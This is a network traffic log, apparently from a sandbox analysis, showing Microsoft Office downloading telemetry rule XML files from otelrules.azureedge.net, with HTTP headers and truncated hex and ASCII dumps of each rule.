2024-11-15 13:10:22 UTC	192	OUT	GET /rules/rule702151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:23 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:22 GMT Content-Type: text/xml Content-Length: 1397 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE156D2EE" x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131022Z-16547b76f7fm7xw6hC1DFW5px40000000n0g00000000cz9b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:23 UTC	1397	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	49899	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:23 UTC	192	OUT	GET /rules/rule702150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:23 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:23 GMT Content-Type: text/xml Content-Length: 1360 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT ETag: "0x8DC582BEDC8193E" x-ms-request-id: 95e3a472-701e-0050-58d2-2c6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131023Z-16547b76f7fhvzzthC1DFW557000000001b000000000ds3q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:23 UTC	1360	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	49901	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:23 UTC	192	OUT	GET /rules/rule703000v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:23 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:23 GMT Content-Type: text/xml Content-Length: 1369 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT ETag: "0x8DC582BE32FE1A2" x-ms-request-id: 320898d6-601e-0032-1378-36eebb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131023Z-164f84587bfwh84ghC1DFWw35400000001gg0000000095hw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:23 UTC	1369	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	49902	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:23 UTC	192	OUT	GET /rules/rule700751v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:23 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:23 GMT Content-Type: text/xml Content-Length: 1414 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE03B051D" x-ms-request-id: 8ba6fbd3-701e-0032-29d2-2ca540000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131023Z-16547b76f7fm7xw6hC1DFW5px40000000n4g00000000512k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:23 UTC	1414	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	49903	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:23 UTC	192	OUT	GET /rules/rule700750v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:24 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:23 GMT Content-Type: text/xml Content-Length: 1377 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT ETag: "0x8DC582BEAFF0125" x-ms-request-id: a393fc50-d01e-0014-411d-36ed58000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131023Z-164f84587bfbvgrghC1DFWbs7w000000019g000000004kvm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:24 UTC	1377	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	49900	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:23 UTC	192	OUT	GET /rules/rule703001v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:24 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:24 GMT Content-Type: text/xml Content-Length: 1406 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT ETag: "0x8DC582BEB16F27E" x-ms-request-id: 81191f4a-001e-0014-6d45-365151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131024Z-164f84587bfdl84ghC1DFWbbhc00000001g000000000905d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:24 UTC	1406	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	49904	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:24 UTC	192	OUT	GET /rules/rule700151v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:24 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:24 GMT Content-Type: text/xml Content-Length: 1399 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT ETag: "0x8DC582BE0A2434F" x-ms-request-id: f87a9289-e01e-0099-41af-36da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131024Z-1866b5c5fbb2t6txhC1DFWa2qc000000016g00000000e838 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:24 UTC	1399	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	49905	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:24 UTC	192	OUT	GET /rules/rule700150v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:24 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:24 GMT Content-Type: text/xml Content-Length: 1362 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT ETag: "0x8DC582BE54CA33F" x-ms-request-id: 198015cf-c01e-00a1-21af-367e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131024Z-1866b5c5fbbtpjhjhC1DFWr6tw00000001b00000000016z8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:24 UTC	1362	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	49906	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:24 UTC	192	OUT	GET /rules/rule703451v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:24 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:24 GMT Content-Type: text/xml Content-Length: 1409 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BDFC438CF" x-ms-request-id: 86712c9d-c01e-007a-5916-36b877000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131024Z-16547b76f7f7scqbhC1DFW0m5w0000000my000000000epcd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:24 UTC	1409	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	49907	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:24 UTC	192	OUT	GET /rules/rule703450v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:24 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:24 GMT Content-Type: text/xml Content-Length: 1372 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT ETag: "0x8DC582BE6669CA7" x-ms-request-id: 149ea2ad-201e-003f-48d2-2c6d94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131024Z-16547b76f7f9s8x7hC1DFWywrg000000011000000000fa80 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:24 UTC	1372	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	49908	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:24 UTC	192	OUT	GET /rules/rule700901v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:25 UTC	515	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:24 GMT Content-Type: text/xml Content-Length: 1408 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE1038EF2" x-ms-request-id: 3dee0c43-f01e-0085-7caf-3688ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131024Z-1866b5c5fbb55pxzhC1DFW1aps000000018g00000000d5d3 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:25 UTC	1408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	49910	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:25 UTC	192	OUT	GET /rules/rule702251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:25 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:25 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE0F427E7" x-ms-request-id: e8cfdd16-001e-0028-2a00-36c49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131025Z-16547b76f7f67wxlhC1DFWah9w0000000n70000000004hc0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
